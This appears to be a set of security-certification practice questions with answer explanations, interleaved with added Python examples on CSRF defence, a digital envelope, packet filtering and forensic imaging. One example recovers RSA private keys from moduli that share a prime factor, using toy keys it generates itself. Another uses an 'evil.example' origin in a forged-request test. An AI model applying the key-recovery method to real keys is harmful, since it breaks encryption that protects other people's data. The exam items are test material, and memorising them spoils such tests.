D An attacker with an NFC reader can skim information from an NFC device in a crowded area, such as a busy train. Juice jacking uses a malicious charging port or cable to exploit the USB On-The-Go (OTG) data connection, acting as a Trojan that tries to read data or install apps; modern versions of both iOS and Android require the user to authorize a data connection before the device will accept it. Bluesnarfing exploits Bluetooth to steal information from someone else's phone; the original exploit, now patched, allowed attackers to circumvent the pairing and authentication mechanisms. A remote wipe or kill switch is a security mechanism that can reset a stolen handset to factory defaults or clear it of any personal data (sanitization).
What type of attack replays a cookie? A. Cross-site request forgery (CSRF or XSRF) B. Clickjacking C. Secure Sockets Layer (SSL) strip attack D. Session hijacking
D. Session hijacking typically means replaying a cookie in some way. Attackers can sniff network traffic to obtain session cookies sent over unsecured networks. A CSRF attack exploits applications that use cookies to authenticate users and track sessions, by convincing the victim to start a session with the target site, then passing an HTTP request to the victim's browser that spoofs a legitimate action. In a clickjacking attack, the user sees and trusts a web application with a malicious layer that allows an attacker to intercept or redirect user input. An SSL strip targets local network clients as they attempt to connect to websites. The threat actor masquerades as the default gateway to redirect a client to an unsecure HTTP site.
PII
Personally Identifiable Information
Security specialists create a sinkhole to disrupt any adversarial attack attempts on a private network. Which solution do the specialists configure? A. Routing traffic to a different network B. Using fake telemetry in response to port scanning C. Configuring multiple decoy directories on a system D. Staging fake IP addresses as active
A A popular disruption strategy is to configure a DNS sinkhole to route suspect traffic to a different network, such as a honeynet, where it can be analyzed. Port triggering or spoofing can disrupt adversarial attacks by returning fake telemetry data when a host detects port scanning activity. To create disruption for an adversary, a security specialist can configure a web server with multiple decoy directories or dynamically generated pages to slow down scanning. Fake telemetry can disrupt an adversary by reporting IP addresses as up and available when they actually are not.
An organization stores data in different geographic locations for redundancy. This data replicates so that it is the same in all locations. Engineers have set the process to send data to the primary storage and then to the second database server. What configuration have the engineers established? A. Asynchronous replication B. Synchronous replication C. On-premises location D. Cloud location
A Asynchronous replication writes data to the primary storage first and then copies the data to the replicas at scheduled intervals. Synchronous replication writes data to all replicas simultaneously. On-premises location refers to physically located systems at an organization's facility. Cloud location refers to physical or virtual systems located at a cloud service provider rather than at an organization's facility.
A system administrator needs secure remote access into a Linux server. Evaluate the types of remote administration to recommend which protocol should be used in this situation. A. Telnet B. Secure Shell (SSH) C. Remote Desktop Protocol (RDP) D. Kerberos
B Secure Shell (SSH) provides an encrypted remote terminal session and is the standard choice for administering a Linux server; it listens on TCP port 22 by default. Telnet sends the whole session, including the login credentials, in cleartext. Remote Desktop Protocol (RDP) is the Windows remote administration protocol (TCP port 3389) and is not native to Linux hosts. Kerberos is an authentication protocol, not a remote administration protocol; SSH can use it to authenticate the user, but it does not provide the remote session itself.
Analyze mobile device deployment models to select the best explanation of the Corporate Owned, Personally-Enabled (COPE) deployment model. A. The employee may use the mobile device to access personal email and social media accounts. The device is chosen and supplied by the company. B. The employee may use the mobile device to access personal email and social media accounts. The device is chosen and supplied by the employee. C. The device is the property of the company and may only be used for company business. D. The employee may use the mobile device to access personal email and social media accounts. The device is chosen by the employee and supplied by the company.
A A Corporate Owned, Personally-Enabled (COPE) device is chosen and supplied by the company and remains its property. The employee may use it to access personal email and social media accounts. A Bring Your Own Device (BYOD) model is owned and supplied by the employee. The employee may use it to access personal email and social media accounts. A Corporate Owned, Business Only (COBO) device is the property of the company and may only be used for company business. A Choose Your Own Device (CYOD) is much like COPE, but the employee is given a choice of a device from a list.
A system administrator wants to install a mechanism to conceal the internal IP addresses of hosts on a private network. What tool can the administrator use to accomplish this security function? A. NAT gateway B. Reverse proxy server C. Virtual firewall D. Access Control List (ACL)
A A NAT gateway translates between a private network and a public network by rewriting the private source address of each outbound packet to one of its own public addresses (and reversing the mapping on the replies), so hosts on the Internet only ever see the public address and the internal addressing scheme stays hidden. Deployed on the network edge, reverse proxy servers protect servers from direct contact with client requests from a public network (the Internet). Virtual firewalls often enact east-west security and zero-trust microsegmentation design paradigms; they can inspect traffic as it passes from host to host or between virtual networks, rather than routing that traffic up to a firewall appliance and back. Firewall access control lists (ACLs) are configured on the principle of least access/least privilege, but they filter traffic rather than conceal addresses.
An Internet Service Provider's (ISP) customer network is under a Distributed Denial of Service (DDoS) attack. The ISP decides to use a blackhole as a remedy. How does the ISP justify their decision? A. A blackhole drops packets for the affected IP address(es) and is in a separate area of the network that does not reach any other part of the network. B. A blackhole makes the attack less damaging to the ISP's other customers and continues to send legitimate traffic to the correct destination. C. A blackhole routes traffic destined to the affected IP address to a different network. Here, the ISP can analyze and identify the source of the attack, to devise rules to filter it. D. A blackhole is preferred, as it evaluates each packet in a multi-gigabit stream against an Access Control List (ACL) without overwhelming the processing resources.
A A blackhole drops all packets for the affected IP address(es). It is an area of the network that cannot reach any other part of the network, which protects the unaffected portion. A blackhole does make the attack less damaging to the ISP's other customers, but it does not deliver legitimate traffic to the correct destination; everything addressed to the target is discarded. Routing traffic for the affected address to a different network for analysis describes a sinkhole, which lets the ISP identify the source of the attack and devise filtering rules. A blackhole does not evaluate each packet. An ACL does evaluate each packet, but doing so for a multi-gigabit stream can overwhelm the processing resources of the filtering device, which is why the blackhole is preferred while the attack is under way.
Analyze the following statements and select the statement which correctly explains the difference between cross-site scripting (XSS) and cross-site request forgery (XSRF). A. XSRF spoofs a specific request against the web application, while XSS is a means of running any arbitrary code. B. XSS is not an attack vector, but the means by which an attacker can perform XSRF, the attack vector. C. XSRF requires a user to click an embedded malicious link, whereas the attacker embeds an XSS attack in the document object module (DOM) script. D. XSRF is a server-side exploit, while XSS is a client-side exploit.
A Cross-site request forgery (CSRF or XSRF) exploits applications that use cookies to authenticate users and track sessions. The attacker passes an HTTP request to the victim's browser that spoofs a specific action on the target site, such as changing a password; because the browser attaches the session cookie automatically, the attacker can accomplish this without the victim necessarily having to click a link. XSS, by contrast, exploits the browser's trust in a site by inserting a malicious script that appears to be part of that trusted site; since the script runs arbitrary code in the victim's browser, it can be used to launch an XSRF attack, among many other things. XSRF is a client-side exploit, not a server-side one. An XSS attack may be reflected (nonpersistent) or stored (persistent) and may target back-end systems (server-side) or client-side scripts.
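The distinction in the two answers above comes down to what a forged request can and cannot carry. The following is an added example, not code from the flashcard source: a server-side check that combines an Origin/Referer test with a per-session synchronizer token. The site origin, the Request shape, the header names and the SESSIONS store are all assumptions made for the example, and the two requests at the end are constructed. Note that this stops CSRF only; it does nothing against session hijacking, where the attacker already holds a copy of the cookie (that needs TLS plus Secure, HttpOnly and SameSite cookie attributes).

```python
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://bank.example"  # assumed origin of the protected application

# Hypothetical server-side session store: session id -> CSRF token bound to it.
SESSIONS = {}


@dataclass
class Request:
    method: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def new_session():
    """Issue a session id plus an unguessable CSRF token tied to that session."""
    sid = secrets.token_urlsafe(16)
    token = secrets.token_urlsafe(32)
    SESSIONS[sid] = token
    return sid, token


def origin_allowed(req):
    """Origin (or, failing that, Referer) must name our own site when present.
    A cross-site form post carries the attacker's origin, which we reject."""
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin:
        return True  # header absent: the token check below still applies
    return origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def is_csrf_safe(req):
    """Decide whether a request may change state.

    The session cookie alone proves nothing: the browser attaches it to a
    forged request just as it does to a legitimate one. The forged request
    cannot, however, carry the per-session token, because the attacking page
    cannot read it out of our site (same-origin policy)."""
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True  # safe methods must not change state
    if not origin_allowed(req):
        return False
    expected = SESSIONS.get(req.cookies.get("session"))
    submitted = req.form.get("csrf_token", "")
    if expected is None or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)  # constant-time comparison


def demo():
    """Constructed traffic: a legitimate password change and a forged one."""
    sid, token = new_session()
    legit = Request("POST", {"Origin": SITE_ORIGIN}, {"session": sid},
                    {"new_password": "hunter2", "csrf_token": token})
    forged = Request("POST", {"Origin": "https://evil.example"}, {"session": sid},
                     {"new_password": "pwned"})  # attacker cannot know the token
    return is_csrf_safe(legit), is_csrf_safe(forged)


if __name__ == "__main__":
    print(demo())
```

Both checks are kept because each covers a gap in the other: Origin and Referer can be stripped by privacy extensions or proxies, and a token check alone is only as good as the secrecy of the token. An XSS flaw on the same origin defeats this entirely, since injected script can read the token out of the page, which is exactly the XSS-then-XSRF chain the answer describes.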
Which statement best illustrates the importance of a strong true random number generator (TRNG) or pseudo-random number generator (PRNG) in a cryptographic implementation? A. A weak number generator leads to many published keys sharing a common factor. B. A weak number generator creates numbers that are never reused. C. A strong number generator creates numbers that are never reused. D. A strong number generator adds salt to encryption values.
A A cryptanalyst can test for the presence of common factors and derive the whole key much more easily. The TRNG or PRNG module in the cryptographic implementation is critical to its strength. Predictability is a weakness in either the cipher operation or within particular key values that make a ciphertext more vulnerable to cryptanalysis. Reuse of the same key within the same session can cause this weakness. The principal characteristic of a nonce is that it is never reused ("number used once") within the same key value. A nonce can be a random, pseudo-random, or counter value. Salt is a random or pseudo-random number or string. The term salt is used specifically in conjunction with hashing password values.
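To make the common-factor weakness concrete, here is an added example (not from the flashcard source) that works the attack through at toy scale with the Python standard library. A deliberately broken key generator draws its "random" primes from only a handful of values, so the published moduli share factors; a pairwise GCD over the public moduli then yields the factorizations, and from p and q the private exponent follows directly. The primes are small and sieved on the fly, the two generators are constructed for the demonstration, and sampling without replacement stands in for the negligible collision probability of a properly seeded generator at real key sizes.

```python
from math import gcd
import secrets


def primes_up_to(limit):
    """Simple sieve; stands in for the prime search a key generator performs."""
    sieve = bytearray([1]) * (limit + 1)
    sieve[0] = sieve[1] = 0
    for i in range(2, int(limit ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, limit + 1, i)))
    return [i for i, is_p in enumerate(sieve) if is_p]


PRIMES = [p for p in primes_up_to(100_000) if p > 50_000]  # toy size, ~4,500 primes
E = 65537  # standard public exponent; coprime to (p-1)(q-1) for every prime here


def weak_keygen(n_keys):
    """Broken generator: its entropy source yields only a handful of distinct
    values, so the 'random' primes are drawn from a tiny set and repeat across
    keys. This is the failure behind shared factors among published keys."""
    moduli = []
    for i in range(n_keys):
        p = PRIMES[i % 3]        # the 'random' choice collapses to 3 values
        q = PRIMES[3 + i % 2]    # ...and 2 values
        moduli.append(p * q)
    return moduli


def strong_keygen(n_keys):
    """Well-seeded generator: distinct primes for every key. Sampling without
    replacement models the negligible collision chance at real key sizes."""
    rng = secrets.SystemRandom()
    chosen = rng.sample(PRIMES, 2 * n_keys)
    return [chosen[2 * i] * chosen[2 * i + 1] for i in range(n_keys)]


def find_shared_factors(moduli):
    """Pairwise GCD over a set of public moduli. Two moduli sharing a prime
    leak both factorizations with no factoring effort at all."""
    found = {}
    for i in range(len(moduli)):
        for j in range(i + 1, len(moduli)):
            g = gcd(moduli[i], moduli[j])
            if 1 < g < moduli[i]:              # shared prime between distinct moduli
                for n in (moduli[i], moduli[j]):
                    found[n] = (g, n // g)
    return found


def recover_private_exponent(p, q, e=E):
    """With p and q known, the private key is one modular inverse away."""
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    broken = find_shared_factors(weak_keygen(6))
    print(f"{len(broken)} of 6 weak keys fully recovered")
    print(f"{len(find_shared_factors(strong_keygen(6)))} of 6 strong keys recovered")
```

At scale the pairwise loop is replaced by a batch-GCD product tree, but the principle is the same: the attacker never factors anything, the weak generator did the work for them.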
Which of the following utilizes both symmetric and asymmetric encryption? A. Digital envelope B. Digital certificate C. Digital evidence D. Digital signature
A A digital envelope is a type of key exchange system that utilizes symmetric encryption for speed and asymmetric encryption for convenience and security. A digital certificate is an electronic document that associates credentials with a public key. This only involves asymmetric encryption. Digital evidence or Electronically Stored Information (ESI) is evidence that cannot be seen with the naked eye; rather, it must be interpreted using a machine or process. There is no encryption involved. A digital signature is a message digest encrypted with a user's private key. It uses only asymmetric encryption to prove the identity of the sender of a message and to show a message has not been tampered with.
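An added example of the envelope structure itself, not code from the flashcard source: the bulk data is encrypted under a fresh symmetric key, and only that key is wrapped with the recipient's public key. To run offline with nothing but the standard library, both primitives are deliberate toys: textbook RSA with the well-known 61 and 53 primes and no padding, and a SHA-256 counter-mode keystream in place of a real cipher. Neither is safe for real data; a practitioner would substitute AES-GCM and RSA-OAEP (or a KEM) from a vetted library, keeping exactly this shape.

```python
import hashlib
import secrets

# Toy recipient key pair: textbook values, far too small to protect anything.
P, Q = 61, 53
N = P * Q                               # 3233
E = 17
D = pow(E, -1, (P - 1) * (Q - 1))       # 2753


def keystream_xor(key, nonce, data):
    """Symmetric part: XOR data with SHA-256(key || nonce || counter) blocks.
    Same call encrypts and decrypts. A real design would use AES-GCM."""
    out = bytearray()
    for block, offset in enumerate(range(0, len(data), 32)):
        ks = hashlib.sha256(key + nonce + block.to_bytes(4, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], ks))
    return bytes(out)


def wrap_key(sym_key, e=E, n=N):
    """Asymmetric part: RSA-encrypt the session key. The toy modulus cannot
    hold a whole key, so each byte is wrapped separately; real RSA wraps the
    key in one randomized, padded block (OAEP), which also removes the
    deterministic byte-to-value mapping this toy has."""
    return [pow(b, e, n) for b in sym_key]


def unwrap_key(wrapped, d=D, n=N):
    return bytes(pow(c, d, n) for c in wrapped)


def seal(plaintext):
    """Sender side: fresh symmetric key per message, wrapped for the recipient."""
    sym_key = secrets.token_bytes(16)
    nonce = secrets.token_bytes(12)
    return {"wrapped_key": wrap_key(sym_key),
            "nonce": nonce,
            "ciphertext": keystream_xor(sym_key, nonce, plaintext)}


def open_envelope(env):
    """Recipient side: recover the symmetric key with the private key, then
    decrypt the bulk data with it."""
    sym_key = unwrap_key(env["wrapped_key"])
    return keystream_xor(sym_key, env["nonce"], env["ciphertext"])


if __name__ == "__main__":
    msg = b"constructed sample message for the envelope demo"
    env = seal(msg)
    print(open_envelope(env) == msg)
```

The division of labour is the point of the answer: the asymmetric operation runs once over 16 bytes, while the symmetric cipher does the heavy lifting over the message, however long it is.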
A system administrator is working to restore a system affected by a stack overflow. Analyze the given choices and determine which overflow vulnerability the attacker exploited. A. An attacker changes the return address of an area of memory used by a program subroutine. B. An attacker overwrites an area of memory allocated by an application to store variables. C. An attacker exploits unsecure code with more values than an array expects. D. An attacker causes the target software to calculate a value that exceeds the set bounds.
A A stack is an area of memory used to hold a program subroutine's local data, including the return address: the location in the calling code that execution jumps back to when the subroutine finishes. An attacker who overflows a buffer on the stack can overwrite that return address and redirect execution; this is a stack overflow. A heap is an area of memory allocated by an application during execution to store variables. A heap overflow can overwrite those variables with unexpected effects. An array is a type of variable designed to store multiple values. It is possible to create an array index overflow by exploiting unsecure code to load the array with more values than it expects. An integer overflow attack causes the target software to calculate a value that exceeds bounds set by the software.
A company conducts file sharing via a hosted private cloud deployment model. Which scenario accurately depicts this type of file sharing? A. A cloud hosted by a third party for the exclusive use of the organization. B. A cloud hosted by a third party and shared with other subscribers. C. A cloud that is completely private to and owned by the company that utilizes it. D. A cloud where several organizations share the costs of a cloud in order to pool resources for a common concern.
A A third party hosts a hosted private cloud deployment model for the exclusive use of the organization. This service is more secure and provides guaranteed performance but is more costly than other options. A third party hosts a public cloud deployment model and shares it with other subscribers. This is the most known form of cloud computing and is the least secure. A private cloud is completely private to and owned by the company that uses it. This is geared toward companies and services that require strict control, such as banking or government entities. Several organizations use a community cloud that shares the costs of either a hosted private or fully private cloud. This is usually done in order to pool resources for a common concern, such as standardization and security policies.
A security engineer is investigating a potential system breach. When compiling a report of the incident, how does the engineer classify the actor and the vector? A. Threat B. Vulnerability C. Risk D. Exploit
A A threat is the potential for something to exploit a vulnerability. The thing that poses the threat is called an actor, while the path used can be referred to as the vector. A vulnerability is a weakness that could be triggered accidentally or exploited intentionally to cause a security breach. Risk is the likelihood and impact (or consequence) of a threat actor exploiting a vulnerability. An exploit is a method that is used to expose and compromise a vulnerability.
Compare and contrast the characteristics of the various types of firewalls and select the correct explanation of a packet filtering firewall. A. An administrator configures an Access Control List (ACL) to deny access to IP addresses B. A firewall that maintains stateful information about the connection C. A firewall that analyzes HTTP headers and the HTML code to identify code that matches a pattern D. A stand-alone firewall implemented with routed interfaces or as a virtual wire transparent firewall
A An administrator configures a packet filtering firewall by specifying a group of rules, called an Access Control List (ACL). Each rule defines a specific type of data packet and the appropriate action to take when a packet matches the rule. Packet filtering firewalls do not maintain stateful information about the connection between two hosts. The firewall analyzes each packet independently, with no record of previously processed packets. Application aware firewalls can inspect the contents of packets at the application layer, which includes analyzing the HTTP headers and the HTML code. An appliance firewall is a stand-alone hardware firewall that monitors all traffic passing into and out of a network segment.
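The stateless behaviour described above is easiest to see by running an ACL over a few packets. This is an added example, not from the flashcard source: a first-match packet filter with an implicit deny, using only the standard library. The rule set, the addresses and the packets are constructed; the one thing to notice is the last case, where a DNS reply to an internal client is dropped because the filter has no record of the outbound query that provoked it.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Packet:
    proto: str    # "tcp", "udp" or "icmp"
    src: str
    sport: int
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str             # "permit" or "deny"
    proto: str              # protocol name or "any"
    src: str                # source network, CIDR
    dst: str                # destination network, CIDR
    dport: Optional[range]  # destination port range; None means any port

    def matches(self, pkt):
        """Every field is checked against this packet alone; nothing about
        earlier packets is consulted, which is what 'stateless' means."""
        return (self.proto in ("any", pkt.proto)
                and ip_address(pkt.src) in ip_network(self.src)
                and ip_address(pkt.dst) in ip_network(self.dst)
                and (self.dport is None or pkt.dport in self.dport))


# Constructed ACL: one public web server and internal clients in 10.0.0.0/8.
ACL = [
    Rule("permit", "tcp", "0.0.0.0/0", "203.0.113.10/32", range(443, 444)),  # HTTPS to web server
    Rule("permit", "any", "10.0.0.0/8", "0.0.0.0/0", None),                  # internal hosts outbound
    Rule("deny", "any", "0.0.0.0/0", "0.0.0.0/0", None),                     # explicit catch-all
]


def evaluate(acl, pkt):
    """First matching rule wins. No match at all is an implicit deny."""
    for rule in acl:
        if rule.matches(pkt):
            return rule.action
    return "deny"


def demo():
    """Four constructed packets; the last one is the stateless filter's blind spot."""
    cases = {
        "https to web server": Packet("tcp", "198.51.100.7", 51515, "203.0.113.10", 443),
        "ssh to web server": Packet("tcp", "198.51.100.7", 51516, "203.0.113.10", 22),
        "client dns query": Packet("udp", "10.1.2.3", 51000, "8.8.8.8", 53),
        "dns reply to client": Packet("udp", "8.8.8.8", 53, "10.1.2.3", 51000),
    }
    return {name: evaluate(ACL, pkt) for name, pkt in cases.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:22s} -> {verdict}")
```

A stateful firewall solves the last case by recording the outbound query in a connection table and permitting the matching reply; a packet filter can only be made to pass it by adding a rule that permits inbound UDP to all high ports, which is the kind of over-broad rule attackers look for.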
An attacker finds a way to exploit a vulnerability in a target application that allows the attacker to bypass a password requirement. Which method did the attacker most likely use? A. The attacker added LDAP filters as unsanitized input by creating a condition that is always true. B. The attacker inserted code into a back-end database by submitting a post to a bulletin board with a malicious script embedded in the message. C. The attacker embedded a request for a local resource via XML with no encryption. D. The attacker modified a basic SQL function, adding code to some input that an app accepts, causing it to execute the attacker's query.
A An attacker could exploit the vulnerability with an LDAP injection attack, inserting the (&) operator to return a condition that is always true, dropping the password filter for a name=value pair. A stored/persistent cross-site scripting (XSS) attack aims to insert unsanitized code into a back-end database a trusted site uses. When other users view the posted message, the malicious script executes. Data submitted via extensible markup language (XML) with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code. In a SQL injection attack, the attacker modifies basic SQL functions by adding code to input that an app accepts, so that the database executes the attacker's query. Here the bypassed control is the directory service's password filter, not a SQL query.
A manufacturing company hires a pentesting firm to uncover any vulnerabilities in their network with the understanding that the pen tester receives no information about the company's system. Which of the following penetration testing strategies is the manufacturing company requesting? A. Black box B. Sandbox C. Gray box D. White box
A Black box (or blind) is when the pen tester receives no privileged information about the network and its security systems. Black box tests are useful for simulating the behavior of an external threat. A sandbox is a test environment that accurately simulates a production environment. It is not a penetration testing strategy. Gray box describes the penetration strategy where the pen tester receives some information. Typically, this would resemble the knowledge of junior or non-IT staff to model particular types of insider threats. White box (or full disclosure) is when the pen tester receives complete access to information about the network. White box tests are useful for simulating the behavior of a privileged insider threat.
A system has a slight misconfiguration which could be exploited. A manufacturing workflow relies on this system. The admin recommends a trial of the proposed settings under which process? A. Change management B. Change control C. Asset management D. Configuration management
A Change management involves careful planning, with consideration for how the change will affect dependent components. For most significant or major changes, organizations should attempt to trial the change first. The admin performs a change control process prior to the actual change. This process requests and approves changes in a planned and controlled way. An asset management process tracks all the organization's critical systems, components, devices, and other objects of value in an inventory. Configuration management ensures that each component of ICT infrastructure is in a trusted state that has not diverged from its documented properties.
Which term defines the practice of collecting evidence from computer systems to an accepted standard in a court of law? A. Forensics B. Due process C. eDiscovery D. Legal hold
A Computer forensics is the practice of collecting evidence from computer systems to an accepted standard in a court of law. Due Process is a common law term used in the US and the UK which requires that people only be convicted of crimes following the fair application of the laws of the land. eDiscovery is a means of filtering the relevant evidence produced from all the data gathered by a forensic examination and storing it in a database in a format to use as evidence in a trial. Legal hold refers to the fact that information that may be relevant to a court case must be preserved.
When endpoint security experiences a breach, there are several classes of vector to consider for mitigation. Which type relates to exploiting an unauthorized service port change? A. Configuration drift B. Weak configuration C. Lack of controls D. Social Engineering
A Configuration drift applies when malware exploits an undocumented configuration change (shadow IT software or an unauthorized service/port, for instance). A weak configuration is correctly applied, but exploited anyway. Review of the settings is recommended to ensure the highest level of security. If endpoint protection/A-V, host firewall, content filtering, DLP, or MDM could have prevented an attack, then investigate the possibility of the lack of security controls. Social engineering means that a user executed an exploit. Use security education and awareness to reduce the risk of future attacks succeeding.
Code developers de-conflict coding with one another during which phase of the software development life cycle (SDLC)? A. Continuous integration B. Continuous delivery C. Continuous validation D. Continuous monitoring
A Continuous integration (CI) is the principle that developers should commit and test updates often. CI aims to detect and resolve coding conflicts early. Continuous delivery is about testing all of the infrastructure that supports an app, including networking, database functionality, client software, and so on. Verification is a compliance testing process to ensure that the product or system meets its design goals; validation is the process of determining whether the application is fit for purpose. These processes ensure the application conforms to the secure configuration baseline. An automation solution will have a system of continuous monitoring to detect service failures and security incidents and to trigger failover mechanisms.
A document contains information about a company that is too valuable to permit any risks, and viewing is severely restricted. Analyze levels of classification and determine the appropriate classification for the document. A. Critical B. Confidential C. Classified D. Unclassified
A Documents labeled as critical contain information that is too valuable to permit any risk of its capture, and viewing is severely restricted. Documents labeled as confidential contain information that is highly sensitive and is for viewing only by approved persons within the organization or possibly by third parties under a Nondisclosure Agreement (NDA). This classification may also be called low. Documents labeled as classified contain information that limits viewing to persons within an organization or to third parties that are under an NDA. This classification may also be called private, restricted, internal use only, or official use only. Unclassified documents are unrestricted and anyone can view them. Such a document does not contain information that will harm the company if released. This classification is also known as public.
Many Internet companies, such as Google and Facebook, allow users to share a single set of credentials between multiple services providers. For example, a user could login to Amazon using their Facebook credentials. Which term correctly defines this example? A. Federation B. Single sign-on C. Permission D. Access control
A Federation means the company trusts the accounts created and managed by a different network. The networks establish trust relationships, so the identity of a user (principal) from network A (identity provider) can be trusted as authentic by network B (service provider). SSO (Single Sign-On) means a user authenticates to a system once to access the resources the system has granted rights to use. This is not an example of a trust relationship. Permission is a security setting, not a trust relationship. It controls access to objects, including file system items and network resources. Access control is the process of determining and assigning privileges to resources, objects, and data. It does not involve a trust relationship.
Compare all of the functions within directory services and determine which statement accurately reflects the function of group memberships. A. The key provided at authentication lists a user's group memberships, which in turn allows certain access to resources on the network. B. The system compares group memberships with the user's logon credentials to determine if the user has access to the network resources. C. Group memberships contain entries for all usernames and groups that have permission to use the resource. D. Group memberships are like a database, where an object is similar to a record, and the attributes known about the object are similar to the fields.
A The access key (token) issued to an authenticated user lists the user's username and group memberships; the system provides this key upon authentication, and the user then has access to every resource allowed to those groups. A security database holds authentication data for users and compares it with the authentication data the user supplies. If the supplied data and the data within the security database match, the system has authenticated the user, and the security database generates an access key. An Access Control List (ACL) controls access to resources. The ACL contains entries for all usernames and groups that have permission to use the resource. A directory is like a database, where an object is like a record and the attributes known about the object are like fields.
Given knowledge of load balancing and clustering techniques, which configuration provides both fault tolerance and consistent performance for applications like streaming audio and video services? A. Active/Passive clustering B. Active/Active clustering C. First in, First out (FIFO) clustering D. Fault tolerant clustering
A In active/passive clustering, if the active node suffers a fault, the connection can failover to the passive node, without performance degradation. In an active/active cluster, both nodes process connections concurrently, using the maximum hardware capacity. During failover, the failed node's workload shifts to the remaining node, the workload on the remaining nodes increases, and performance degrades. Most network appliances process packets on a best effort and first in, first out (FIFO) basis, while the Quality of Service (QoS) framework prioritizes traffic based on its characteristics to better support voice and video applications susceptible to latency and jitter. Failover ensures that a redundant component, device, or application can quickly and efficiently take over the functionality of an asset that has failed.
When a company attempts to re-register their domain name, they find that an attacker has supplied false credentials to the domain registrar and redirected their host records to a different IP address. What type of attack has occurred? A. Domain hijacking B. Domain name system client cache (DNS) poisoning C. Rogue dynamic host configuration protocol (DHCP) D. Domain name system server cache (DNS) poisoning
A In domain hijacking (or brandjacking), the attacker steals a domain name by altering its registration information and then transferring the domain name to another entity. Before DNS is contacted, a text file named HOSTS is checked that may have name:IP address mappings recorded. If an attacker can place a false name:IP address mapping in the HOSTS file, the client's own name resolution is poisoned and the attacker can redirect traffic. The Dynamic Host Configuration Protocol (DHCP) facilitates automatic network address allocation. If an attacker establishes a rogue DHCP server, it can perform DoS or snoop on network information. DNS server cache poisoning corrupts records within the DNS server itself.
An engineer plans to acquire data from a disk. The disk is connected to the forensics workstation and is ready for the engineer. Which steps indicate a correct order of acquisition as they relate to integrity and non-repudiation? A. 1. A hash of the disk is made 2. A bit-by-bit copy is made 3. A second hash is made 4. A copy is made of the reference image B. 1. A hash of the disk is made 2. A copy is made of the reference image 3. A second hash is made 4. A bit-by-bit copy is made C. 1. A copy is made of the reference image 2. A hash of the disk is made 3. A bit-by-bit copy is made 4. A second hash is made D. 1. A copy is made of the reference image 2. A bit-by-bit copy is made 3. A hash of the disk is made 4. A second hash is made
A In the correct first step, the engineer makes a cryptographic hash of the disk media, using either the MD5 or SHA hashing function (SHA-256 is preferred today, since MD5 collisions are practical). The output of the function is a checksum. In the correct second step, the engineer makes a bit-by-bit copy of the media using the imaging utility. In the correct third step, the engineer makes a second hash of the image, which should match the original hash of the media. In the correct fourth step, the engineer makes a copy of the reference image and validates it again against the checksum. The engineer then performs the analysis on that copy, never on the original media or the reference image.
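The four steps above as one function that refuses to continue past a hash mismatch. This is an added example, not from the flashcard source: it uses SHA-256 and reads in fixed-size chunks as an imaging tool must for a multi-gigabyte device, but the "disk" is a constructed byte string held in memory rather than a real block device.

```python
import hashlib
import io

CHUNK = 4096  # read size; a real imager reads sector-aligned blocks the same way


def hash_stream(stream, chunk_size=CHUNK):
    """Hash a file-like object in chunks without loading it all into memory."""
    h = hashlib.sha256()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def image_stream(src, dst, chunk_size=CHUNK):
    """Bit-for-bit copy src -> dst (what dd or dc3dd does). Returns bytes written."""
    written = 0
    for chunk in iter(lambda: src.read(chunk_size), b""):
        dst.write(chunk)
        written += len(chunk)
    return written


def acquire(disk):
    """Run the acquisition in order, aborting on the first integrity failure."""
    source = io.BytesIO(disk)
    source_hash = hash_stream(source)                    # 1. hash the evidence media
    source.seek(0)
    reference = io.BytesIO()
    image_stream(source, reference)                      # 2. bit-by-bit copy
    reference.seek(0)
    if hash_stream(reference) != source_hash:            # 3. second hash must match
        raise RuntimeError("reference image does not match source: re-acquire")
    reference.seek(0)
    working = io.BytesIO()
    image_stream(reference, working)                     # 4. copy of the reference image...
    working.seek(0)
    if hash_stream(working) != source_hash:              #    ...validated by the same checksum
        raise RuntimeError("working copy does not match reference image")
    return {"hash": source_hash,
            "reference": reference.getvalue(),   # sealed and stored, never analysed directly
            "working": working.getvalue()}       # the copy the analysis runs on


def verify_untouched(artifact, recorded_hash):
    """Any later integrity check: a single flipped bit breaks the match."""
    return hash_stream(io.BytesIO(artifact)) == recorded_hash


if __name__ == "__main__":
    evidence = bytes(range(256)) * 40  # constructed stand-in for a disk
    result = acquire(evidence)
    print(result["hash"], verify_untouched(result["working"], result["hash"]))
```

Recording the checksum together with who computed it and when is what turns these hashes into evidence of integrity and non-repudiation; the hash alone only proves that two byte strings are identical.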
A network user calls the help desk after receiving an error message. The caller complains that the error message does not indicate whether the username or password input was incorrect but simply states there was an authentication error. What does this situation illustrate? A. Effective exception handling B. Dynamic code analysis C. Minimizing data exposure D. Web application validation
A Invalid user input can cause an error or exception. A structured exception handler (SEH) dictates what the application should then do. The application must not fail in a way that allows an attacker to execute code or perform some sort of injection attack, and its error messages must not leak detail that helps an attacker; a generic "authentication error" that does not reveal whether the username or the password was wrong is an example of handling the failure correctly. Dynamic analysis tests the application under "real world" conditions using a staging environment. Data exposure is a fault that allows privileged information (such as a token, password, or personal data) to be read without being subject to the appropriate access controls. Web application validation refers to input validation performed by the application itself, for example a document object model (DOM) script that checks user input before rendering dynamic page elements from it.
An organization plans a move of systems to the cloud. In order to identify and assign areas of risk, which solution does the organization establish to contractually specify cloud service provider responsibilities? A. Service level agreement B. Trust relationship C. Responsibilities matrix D. High availability
